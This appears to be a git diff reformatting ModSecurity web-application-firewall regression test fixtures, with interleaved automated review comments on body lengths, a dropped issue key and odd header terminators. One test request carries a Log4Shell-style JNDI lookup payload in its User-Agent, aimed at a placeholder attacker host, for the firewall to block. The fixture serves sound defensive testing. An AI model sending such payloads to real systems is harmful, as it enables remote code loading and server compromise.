"----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -105,10 +113,18 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "http_code":200 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecTmpSaveUploadedFiles On", diff --git a/test/test-cases/regression/issue-3340.json b/test/test-cases/regression/issue-3340.json index 6251c860d4..3b37802098 100644 --- a/test/test-cases/regression/issue-3340.json +++ b/test/test-cases/regression/issue-3340.json 
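Review bot: Case (2/2) in the hunk at `@@ -60,30 +68,30 @@` keeps `"Content-Length": "330"` although its body entries carry no line terminators (`"Content-Disposition: form-data; name=\"name\""`, `""`), whereas case (1/2) declares the same 330 with every entry ending in `\n`, so the two bodies cannot both have that length. Since the first patch of this series stops the harness from appending a newline per entry, this body presumably reaches the multipart parser as a single unbroken line, and the expected `"http_code": 200` may be satisfied without any file part being extracted for `@inspectFile`. If that is the intended negative case, say so in the title, e.g. `"title": "Tmp file retained for @inspectFile (2/2) - body without line breaks"`; otherwise the entries need explicit terminators as in (1/2). Most of the body array sits between this hunk and the next one, so this is judged from the entries that are visible.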
@@ -16,7 +16,7 @@ "headers": { "Host": "localhost", "User-Agent": "${jndi:ldap://evil.om/w}", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -29,13 +29,17 @@ "uri": "/", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8" + "Content-Type": "text/xml; charset=utf-8" }, - "body": "OK" + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-394.json b/test/test-cases/regression/issue-394.json index 82827ac868..ab107ee66b 100644 --- a/test/test-cases/regression/issue-394.json +++ b/test/test-cases/regression/issue-394.json 
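Review bot: The second hunk (`@@ -29,13 +29,17 @@`) changes fixture data, not just its shape: the response `"body": "OK"` becomes `"body": [ "" ]`, while the request body conversion from `""` to `[ "" ]` keeps its value. To keep this a pure normalisation the response should read `"body": [ "OK" ]`. The expected 403 is unlikely to depend on the response body, but that is not visible from this hunk, and the rules array continues outside it.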
@@ -1,38 +1,44 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Segmentation fault when uploading file with SecStreamInBodyInspection enabled", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/394", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "audit_logs": "", - "debug_logs": "", - "error_logs": "" - }, - "rules": [ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecResponseBodyAccess On" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Segmentation fault when uploading file with SecStreamInBodyInspection enabled", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/394", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecResponseBodyAccess On" + ] + } ] diff --git a/test/test-cases/regression/issue-849.json b/test/test-cases/regression/issue-849.json index 60e0d4e2a4..dfb1795f11 100644 --- a/test/test-cases/regression/issue-849.json +++ b/test/test-cases/regression/issue-849.json 
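Review bot: The misspelt `"gihub_issue": 394` key is deleted here rather than corrected, while issue-2423-msg-in-chain.json in the same patch keeps `"github_issue": 2423`. If the key is meant as the machine-readable link to the tracker, rename it instead of dropping it: `"github_issue": 394,`. The same deletion appears in the three cases of issue-960.json. Whether the harness reads either spelling is not visible in this patch.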
@@ -3,8 +3,8 @@ "enabled": 1, "version_min": 209000, "version_max": -1, - "title": "@ipMatch \"Could not add entry\" on slash\/32 notation in 2.9.0 (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/849", + "title": "@ipMatch \"Could not add entry\" on slash/32 notation in 2.9.0 (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/849", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -27,31 +27,36 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 }, "rules": [ "SecRuleEngine On", - "SecRule REMOTE_ADDR \"@ipMatch 200.249.12.31\/32\" \"phase:1,nolog,pass,msg:'Localhost connection',id:1,deny,status:403\"" + "SecRule REMOTE_ADDR \"@ipMatch 200.249.12.31/32\" \"phase:1,nolog,pass,msg:'Localhost connection',id:1,deny,status:403\"" ] }, { "enabled": 1, "version_min": 209000, "version_max": -1, - "title": "@ipMatch \"Could not add entry\" on slash\/32 notation in 2.9.0 (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/849", + "title": "@ipMatch \"Could not add entry\" on slash/32 notation in 2.9.0 (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/849", "client": { "ip": "200.249.12.31", "port": 2313 
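Review bot: The response header value rewritten in the hunk at `@@ -27,31 +27,36 @@` still ends in `\n\r`, which is LF followed by CR, the reverse of the CRLF an HTTP header line ends with, and the neighbouring `"Content-Length": "length\n\r"` does the same. A line terminator inside a header value is the shape of a header-injection input, so if that is not what this case is testing the value is better written plain: `"Content-Type": "text/xml; charset=utf-8",`. If it is deliberate, `\r\n` would match the wire format. The second case repeats it in the hunk at `@@ -74,16 +79,21 @@`.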
@@ -64,7 +69,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -74,16 +79,21 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-960.json b/test/test-cases/regression/issue-960.json index 0fdb1ceaca..6a9ea465ad 100644 --- a/test/test-cases/regression/issue-960.json +++ b/test/test-cases/regression/issue-960.json 
@@ -1,124 +1,134 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (1/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (1/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "\\(Rule: 960032\\) .* Rule returned 0.", - "error_log": "" + "http_code": 200 }, - "rules": [ - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by 
policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (2/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (2/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": 
"200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", - "error_log": "", "http_code": 418 }, - "rules": [ - "SecRuleEngine On", - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecRuleEngine On", + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by 
policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (3/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (3/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", - "error_log": "", "http_code": 418 }, - "rules": [ - "SecRuleEngine On", - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"!@within 
%{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecRuleEngine On", + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -} + } ] diff --git a/test/test-cases/regression/misc-variable-under-quotes.json b/test/test-cases/regression/misc-variable-under-quotes.json index c455b69dec..865f1f3b04 100644 --- a/test/test-cases/regression/misc-variable-under-quotes.json +++ b/test/test-cases/regression/misc-variable-under-quotes.json 
@@ -1,79 +1,86 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables (quoted) :: REQUEST_LINE - contains (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 +[ + { + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables (quoted) :: REQUEST_LINE - contains (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "debug_log":"t:lowercase:" + "expected": { + "debug_log": "t:lowercase:", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule \"REQUEST_LINE\" \"@contains index.php/admin/cms/wysiwyg/directive/\" \"id:1,phase:1,t:lowercase,ctl:auditLogParts=+E\"" ] }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables (quoted) :: REQUEST_LINE - regex (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + { + "enabled": 1, + "version_min": 300000, + "title": "Testing Variables (quoted) :: REQUEST_LINE - regex (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"t:lowercase:" + "expected": { + "debug_log": "t:lowercase:", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule \"REQUEST_LINE\" \"index.php/admin/cms/wysiwyg/directive/\" \"id:1,t:lowercase,ctl:auditLogParts=+E\"" ] } ] - diff --git a/test/test-cases/regression/misc.json b/test/test-cases/regression/misc.json index f089459927..fd4507928b 100644 --- a/test/test-cases/regression/misc.json +++ b/test/test-cases/regression/misc.json 
@@ -1,15 +1,40 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecRule directives should be case insensitive", - "expected":{ - "audit_log":"", - "debug_log":"Executing operator \"Contains\" with param \"PHPSESSID\" against REQUEST_HEADERS.", - "error_log":"" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRule directives should be case insensitive", + "client": { + "ip": "", + "port": 0 }, - "rules":[ + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"PHPSESSID\" against REQUEST_HEADERS.", + "http_code": 200 + }, + "rules": [ "secruleengine On", "secrule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "secrule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/offset-variable.json b/test/test-cases/regression/offset-variable.json index b5c4ed99ff..d914958d20 100644 --- a/test/test-cases/regression/offset-variable.json +++ b/test/test-cases/regression/offset-variable.json 
@@ -1,990 +1,1316 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"o0,3v23,6t:trim" + "expected": { + "error_log": "o0,3v23,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS \"@rx val\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value2", - "method":"GET" + "uri": "/index.html?param1=value1¶m2=value2", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o3,3v37,6t:trim" + "expected": { + "error_log": "o3,3v37,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRule ARGS_GET \"@rx ue2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST 1", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value1" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o3,3v142,6t:trim" + "expected": { + "error_log": "o3,3v142,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST \"@rx ue1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_POST 2", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_POST 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o3,3v156,6t:trim" + "expected": { + "error_log": "o3,3v156,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_POST \"@rx ue2\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 1", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 1", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "error_log":"o0,6v17,6t:trim" + "expected": { + "error_log": "o0,6v17,6t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecRule ARGS_GET_NAMES \"@rx param1\" \"id:1,phase:2,pass,t:trim,msg:'ops'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_GET_NAMES 2", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_GET_NAMES 2", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param1=value1¶m2=value1", - "method":"POST", - "body":[ + "uri": "/index.html?param1=value1¶m2=value1", + "method": "POST", + "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
